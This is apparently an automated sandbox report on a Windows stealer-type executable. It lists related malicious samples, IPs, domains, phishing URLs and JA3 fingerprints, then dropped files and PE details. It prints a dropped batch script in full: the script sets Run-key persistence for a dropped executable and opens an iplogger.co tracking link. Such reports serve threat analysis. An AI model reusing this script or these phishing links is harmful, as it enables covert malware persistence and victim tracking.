                                                                                                  https://clienti.documentipostali.it/#/public/email/a703266c-62aa-4024-8f0c-254725c31c25-DD0015830773-D0002973415Get hashmaliciousUnknownBrowse
                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        https://clienti.documentipostali.it/#/public/email/a703266c-62aa-4024-8f0c-254725c31c25-Get hashmaliciousUnknownBrowse
                                                                                                          104.21.82.93cmd.exeGet hashmaliciousUnknownBrowse
                                                                                                            newvideozones.click.ps1Get hashmaliciousLummaCBrowse
                                                                                                              newvideozones.click.ps1Get hashmaliciousUnknownBrowse
                                                                                                                pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev.ps1Get hashmaliciousLummaCBrowse
                                                                                                                  encrypter-windows-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                    yWny5Jds8b.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                                      https://prezi.com/i/view/0dF0780HKO9RqC8umFaJGet hashmaliciousUnknownBrowse
                                                                                                                        172.67.156.217ACTCsxhga8.exeGet hashmaliciousGlupteba, SmokeLoader, StealcBrowse
                                                                                                                        • cwd.com.au/administrator/
                                                                                                                        172.67.167.249sus.ps1Get hashmaliciousLummaCBrowse
                                                                                                                          ofsetvideofre.click.ps1Get hashmaliciousLummaCBrowse
                                                                                                                            4h1Zc12ZBe.exeGet hashmaliciousStealcBrowse
                                                                                                                              dlcdkJcbbV.exeGet hashmaliciousLummaC, RedLineBrowse
                                                                                                                                1Vkf7silOj.exeGet hashmaliciousLummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                                                                                                                                  hsRju5CPK2.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                    https://prezi.com/i/view/0dF0780HKO9RqC8umFaJGet hashmaliciousUnknownBrowse

                                                                                                                                      Domains

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      iplogger.cosus.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.167.249
                                                                                                                                      cW5i0RdQ4L.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.21.76.57
                                                                                                                                      cW5i0RdQ4L.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.21.76.57
                                                                                                                                      Activator by URKE v2.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 172.67.188.178
                                                                                                                                      SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.21.76.57
                                                                                                                                      file.exeGet hashmaliciousDarkTortilla, PureLog StealerBrowse
                                                                                                                                      • 104.21.76.57
                                                                                                                                      file.exeGet hashmaliciousDarkTortillaBrowse
                                                                                                                                      • 104.21.76.57
                                                                                                                                      cmd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.21.82.93
                                                                                                                                      cmd.exeGet hashmaliciousBEASTBrowse
                                                                                                                                      • 104.21.82.93

                                                                                                                                      ASNs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.67.165.166
                                                                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff9nftzflxfiBfgCvf8ffsjfl9fikffCff9vftzfh*~*fimff8vf/vfqjfiffgufg*~*ff8nfrjfl9figfgyvfEnftnfjffinfgzvf8ffsvfmlfiofgxffEnfszflhfitfgCvf9vfszflvfgtfgwvf8DfszfmDfgDfg*~*ffafflffipfgxffBvfsDfrvfiffgvff9ffrnflrfllfgsff8vfrffrjfirfgsff7ffrnfrnflhfgsff9ffEffmffitfgsff7vfEvflDfihfgAff8fftnflzflrfikfgwvfsDfuvfiffgAff9vfqnfrnfihfiiff9ffsfflDflpfgBffBvftnflDfitfgyffBvfsfflzflrfikffBvftfflnflpfgCffBvfEvfmfflpfilfgxvfsffrzflrfihff8vfrvflrfmDfgvffDffrnfkzfllfgxfgwffrvfl9flpfgAfgwffqnfmjfipfiiff7vfqnflvfllfiiff8vfqnfmffllfgwfgwffqnflDfilfgDffEffDDfmffinfgxfgxvfsvfmffijfi9fg*~*ffvnfuvff====___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjczN2NjZDA5MTMxODVlMzdkYWUzNjFjZjM4Yzg3Y2ZlOjc6ZjRkNToxN2E5YzZkNWIxZGY2MjgxODRlOTdhNmI5MDkxMDNmY2VkOTNmZGVmZWNhODNlZDEwNTdjNGFkZGY2ZGVlMDc5Omg6VDpUGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.140.160
                                                                                                                                      https://clienti.documentipostali.it/#/public/email/a703266c-62aa-4024-8f0c-254725c31c25-DD0015830773-D0002973415Get hashmaliciousUnknownBrowse
                                                                                                                                      • 104.17.25.14
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                      • 172.67.165.166
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      https://economiesocialeestrie-my.sharepoint.com/:f:/g/personal/cynthia_economiesocialeestrie_ca/Eg3bU_gVnldCmtzlGs9oSUQBYKQRNnAURt93MlkOZFbwAg?email=gaston.stratford%40assnat.qc.ca&e=iSpthp&xsdata=MDV8MDJ8R2FzdG9uLlN0cmF0Zm9yZEBhc3NuYXQucWMuY2F8Y2RjYmI0YjE1ZGI0NGZhNmQzYjUwOGRkMTA4MmQxNTh8MWE1NjE5ODBkNjc0NGQzMGEyOTc1ODhjMDdhODMzNTN8MHwwfDYzODY4NDg3NjU1MjMyNTA1OHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SkZiWEIwZVUxaGNHa2lPblJ5ZFdVc0lsWWlPaUl3TGpBdU1EQXdNQ0lzSWxBaU9pSlhhVzR6TWlJc0lrRk9Jam9pVFdGcGJDSXNJbGRVSWpveWZRPT18MHx8fA%3d%3d&sdata=YVp6WGNQM0psVGw2TU5teXRVbmhhMy9VaDRhYW5SeWdTN0pDaTBKV2p2Yz0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 1.1.1.1
                                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.67.165.166
                                                                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff9nftzflxfiBfgCvf8ffsjfl9fikffCff9vftzfh*~*fimff8vf/vfqjfiffgufg*~*ff8nfrjfl9figfgyvfEnftnfjffinfgzvf8ffsvfmlfiofgxffEnfszflhfitfgCvf9vfszflvfgtfgwvf8DfszfmDfgDfg*~*ffafflffipfgxffBvfsDfrvfiffgvff9ffrnflrfllfgsff8vfrffrjfirfgsff7ffrnfrnflhfgsff9ffEffmffitfgsff7vfEvflDfihfgAff8fftnflzflrfikfgwvfsDfuvfiffgAff9vfqnfrnfihfiiff9ffsfflDflpfgBffBvftnflDfitfgyffBvfsfflzflrfikffBvftfflnflpfgCffBvfEvfmfflpfilfgxvfsffrzflrfihff8vfrvflrfmDfgvffDffrnfkzfllfgxfgwffrvfl9flpfgAfgwffqnfmjfipfiiff7vfqnflvfllfiiff8vfqnfmffllfgwfgwffqnflDfilfgDffEffDDfmffinfgxfgxvfsvfmffijfi9fg*~*ffvnfuvff====___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjczN2NjZDA5MTMxODVlMzdkYWUzNjFjZjM4Yzg3Y2ZlOjc6ZjRkNToxN2E5YzZkNWIxZGY2MjgxODRlOTdhNmI5MDkxMDNmY2VkOTNmZGVmZWNhODNlZDEwNTdjNGFkZGY2ZGVlMDc5Omg6VDpUGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.140.160
                                                                                                                                      https://clienti.documentipostali.it/#/public/email/a703266c-62aa-4024-8f0c-254725c31c25-DD0015830773-D0002973415Get hashmaliciousUnknownBrowse
                                                                                                                                      • 104.17.25.14
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                      • 172.67.165.166
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      https://economiesocialeestrie-my.sharepoint.com/:f:/g/personal/cynthia_economiesocialeestrie_ca/Eg3bU_gVnldCmtzlGs9oSUQBYKQRNnAURt93MlkOZFbwAg?email=gaston.stratford%40assnat.qc.ca&e=iSpthp&xsdata=MDV8MDJ8R2FzdG9uLlN0cmF0Zm9yZEBhc3NuYXQucWMuY2F8Y2RjYmI0YjE1ZGI0NGZhNmQzYjUwOGRkMTA4MmQxNTh8MWE1NjE5ODBkNjc0NGQzMGEyOTc1ODhjMDdhODMzNTN8MHwwfDYzODY4NDg3NjU1MjMyNTA1OHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SkZiWEIwZVUxaGNHa2lPblJ5ZFdVc0lsWWlPaUl3TGpBdU1EQXdNQ0lzSWxBaU9pSlhhVzR6TWlJc0lrRk9Jam9pVFdGcGJDSXNJbGRVSWpveWZRPT18MHx8fA%3d%3d&sdata=YVp6WGNQM0psVGw2TU5teXRVbmhhMy9VaDRhYW5SeWdTN0pDaTBKV2p2Yz0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 1.1.1.1
                                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.67.165.166
                                                                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff9nftzflxfiBfgCvf8ffsjfl9fikffCff9vftzfh*~*fimff8vf/vfqjfiffgufg*~*ff8nfrjfl9figfgyvfEnftnfjffinfgzvf8ffsvfmlfiofgxffEnfszflhfitfgCvf9vfszflvfgtfgwvf8DfszfmDfgDfg*~*ffafflffipfgxffBvfsDfrvfiffgvff9ffrnflrfllfgsff8vfrffrjfirfgsff7ffrnfrnflhfgsff9ffEffmffitfgsff7vfEvflDfihfgAff8fftnflzflrfikfgwvfsDfuvfiffgAff9vfqnfrnfihfiiff9ffsfflDflpfgBffBvftnflDfitfgyffBvfsfflzflrfikffBvftfflnflpfgCffBvfEvfmfflpfilfgxvfsffrzflrfihff8vfrvflrfmDfgvffDffrnfkzfllfgxfgwffrvfl9flpfgAfgwffqnfmjfipfiiff7vfqnflvfllfiiff8vfqnfmffllfgwfgwffqnflDfilfgDffEffDDfmffinfgxfgxvfsvfmffijfi9fg*~*ffvnfuvff====___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjczN2NjZDA5MTMxODVlMzdkYWUzNjFjZjM4Yzg3Y2ZlOjc6ZjRkNToxN2E5YzZkNWIxZGY2MjgxODRlOTdhNmI5MDkxMDNmY2VkOTNmZGVmZWNhODNlZDEwNTdjNGFkZGY2ZGVlMDc5Omg6VDpUGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.140.160
                                                                                                                                      https://clienti.documentipostali.it/#/public/email/a703266c-62aa-4024-8f0c-254725c31c25-DD0015830773-D0002973415Get hashmaliciousUnknownBrowse
                                                                                                                                      • 104.17.25.14
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                      • 172.67.165.166
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      https://economiesocialeestrie-my.sharepoint.com/:f:/g/personal/cynthia_economiesocialeestrie_ca/Eg3bU_gVnldCmtzlGs9oSUQBYKQRNnAURt93MlkOZFbwAg?email=gaston.stratford%40assnat.qc.ca&e=iSpthp&xsdata=MDV8MDJ8R2FzdG9uLlN0cmF0Zm9yZEBhc3NuYXQucWMuY2F8Y2RjYmI0YjE1ZGI0NGZhNmQzYjUwOGRkMTA4MmQxNTh8MWE1NjE5ODBkNjc0NGQzMGEyOTc1ODhjMDdhODMzNTN8MHwwfDYzODY4NDg3NjU1MjMyNTA1OHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SkZiWEIwZVUxaGNHa2lPblJ5ZFdVc0lsWWlPaUl3TGpBdU1EQXdNQ0lzSWxBaU9pSlhhVzR6TWlJc0lrRk9Jam9pVFdGcGJDSXNJbGRVSWpveWZRPT18MHx8fA%3d%3d&sdata=YVp6WGNQM0psVGw2TU5teXRVbmhhMy9VaDRhYW5SeWdTN0pDaTBKV2p2Yz0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 1.1.1.1

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 20.109.210.53
                                                                                                                                      • 13.107.246.63
                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                      • 20.109.210.53
                                                                                                                                      • 13.107.246.63
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 20.109.210.53
                                                                                                                                      • 13.107.246.63
                                                                                                                                      https://clienti.documentipostali.it/#/public/email/a703266c-62aa-4024-8f0c-254725c31c25-DD0015830773-D0002973415Get hashmaliciousUnknownBrowse
                                                                                                                                      • 20.109.210.53
                                                                                                                                      • 13.107.246.63
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • 20.109.210.53
                                                                                                                                      • 13.107.246.63
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 20.109.210.53
                                                                                                                                      • 13.107.246.63
                                                                                                                                      https://clienti.documentipostali.it/#/public/email/a703266c-62aa-4024-8f0c-254725c31c25-Get hashmaliciousUnknownBrowse
                                                                                                                                      • 20.109.210.53
                                                                                                                                      • 13.107.246.63
                                                                                                                                      https://shorturl.at/IFOx4?US=7226wlevGet hashmaliciousUnknownBrowse
                                                                                                                                      • 20.109.210.53
                                                                                                                                      • 13.107.246.63
                                                                                                                                      https://mobile.mail.yahoo.com/apps/affiliateRouter?brandUrl=https://www.google.com/amp/t.co/N0QLoca1EY&appName=YMailNorrin&partner=1&locale=1&pageId=commerce_intent&clickRef=message_header&region=us&annotation=&buckets=&segment=&interactedItem=&slot=&uuid=mailNAGet hashmaliciousUnknownBrowse
                                                                                                                                      • 20.109.210.53
                                                                                                                                      • 13.107.246.63
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 20.109.210.53
                                                                                                                                      • 13.107.246.63
                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.67.156.217
                                                                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                                                      • 172.67.156.217
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.67.156.217
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.67.156.217
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                      • 172.67.156.217
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • 172.67.156.217
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.67.156.217
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.67.156.217
                                                                                                                                      weWHT1b7JO.dllGet hashmaliciousUnknownBrowse
                                                                                                                                      • 172.67.156.217
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.67.156.217

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Users\Public\Netstat\dileapp.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1928704
                                                                                                                                      Entropy (8bit):7.950017394374122
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:9gQrhDDlpKUtMd2L+1uyewdTV7wHUrzl:7rhD+tP1uyewtVUol
                                                                                                                                      MD5:B0D5568D499D1DFA75064E85E9FB3EAC
                                                                                                                                      SHA1:B6297B622C70955E56BB209F221D96BA7B9ECB11
                                                                                                                                      SHA-256:27E0A780B1461B79A366E320872C9F937532881168FF70864AFA733D63C502D5
                                                                                                                                      SHA-512:721ABFDBEC39BA2C4959426F50293DBFF2F80750AB6DD37CE4B6C86AAA781EF69622D126C67579A9DC4D913B7284C40AEFBE913892D8F4526808C2F48957D5D7
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...L0Gg.............................`L...........@...........................L..........@.................................\@..p....0.......................A...................................................................................... . . .......J..................@....rsrc........0.......Z..............@....idata .....@.......\..............@... ..,..P.......^..............@...fngpdisv.....`1......`..............@...tvvnknfw.....PL......F..............@....taggant.0...`L.."...L..............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\Public\Netstat\s.bat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347
                                                                                                                                      Entropy (8bit):5.241342430352341
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:hwszH1j0KpIAgidquHxEDscfoZH1j0KpIAgidquHxEDsWEEDwTGQCCAP+YOA:HVj0KprgidquS+Vj0KprgidquqSqXCQ9
                                                                                                                                      MD5:C27142AA5D9C13E25E9335A57A952743
                                                                                                                                      SHA1:725EED87891582F0D5BC1622F5A84CB5B77E2495
                                                                                                                                      SHA-256:C5A6FC64F2EBF5C1FD0E39E4AE37D53FEA01A6758A74B1544D2D475A97DD09AD
                                                                                                                                      SHA-512:43FC9B010ED3CD9F7ADD8E774613492355E41D08FD9E2790AFD0CF9ED08133BE74BDC543C5D6820CE4B68898D07407EC5CF090DBD75180255A4763A3C730BE42
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\dileapp.exe"..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\dileapp.exe"..start %Public%\Netstat\dileapp.exe..@echo off..start "" "https://iplogger.co/1tJFB4"..exit..

                                                                                                                                      Chrome Cache Entry: 47

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):2833
                                                                                                                                      Entropy (8bit):7.876846206921263
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                                                      MD5:18C023BC439B446F91BF942270882422
                                                                                                                                      SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                                                      SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                                                      SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://iplogger.co/favicon.ico
                                                                                                                                      Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

                                                                                                                                      Chrome Cache Entry: 48

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2833
                                                                                                                                      Entropy (8bit):7.876846206921263
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                                                      MD5:18C023BC439B446F91BF942270882422
                                                                                                                                      SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                                                      SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                                                      SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.943466786411873
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:file.exe
                                                                                                                                      File size:2'210'104 bytes
                                                                                                                                      MD5:eff5fbe427181fe1a3eed978cf0c9a36
                                                                                                                                      SHA1:ddc48ac8b408c35b8bae9caf0b6c69df56a7c3e3
                                                                                                                                      SHA256:7119f52e94061723532085e4a082e0cb8bd3a6788b729fa41730571d77924c4d
                                                                                                                                      SHA512:b515848a86978d7b6ffeda2d5c8c057d76ce18e6ac34c88b24bd02c2495a72839c3487d480d83511e24f266224e36e1c8a039ba890399ed6c9afc811099191a3
                                                                                                                                      SSDEEP:49152:VIflOUNzXT+SitPBehfQcSm6PPc8V4/s4dEDS:VImVoQ66PU8V4/V
                                                                                                                                      TLSH:FBA52300B9C698B3E2311D315919BBA175BC7F202F10AABFB3D45E9EC63C1A17235963
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~..............b.......b..<....b......)^...................................................... ....... .......%....... ......

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:1515d4d4442f2d2d

                                                                                                                                      Static PE Info

                                                                                                                                      General

                                                                                                                                      Entrypoint:0x41d779
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:5
                                                                                                                                      OS Version Minor:1
                                                                                                                                      File Version Major:5
                                                                                                                                      File Version Minor:1
                                                                                                                                      Subsystem Version Major:5
                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                      Import Hash:00be6e6c4f9e287672c8301b72bdabf3

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      call 00007FCCB0B303CFh
                                                                                                                                      jmp 00007FCCB0B2FDC3h
                                                                                                                                      cmp ecx, dword ptr [0043A1C8h]
                                                                                                                                      jne 00007FCCB0B2FF35h
                                                                                                                                      ret
                                                                                                                                      jmp 00007FCCB0B30546h
                                                                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                                                                      mov eax, ecx
                                                                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                                                                      mov dword ptr [ecx+04h], 00430FE8h
                                                                                                                                      mov dword ptr [ecx], 00431994h
                                                                                                                                      ret
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      push esi
                                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                                      mov esi, ecx
                                                                                                                                      call 00007FCCB0B234CDh
                                                                                                                                      mov dword ptr [esi], 004319A0h
                                                                                                                                      mov eax, esi
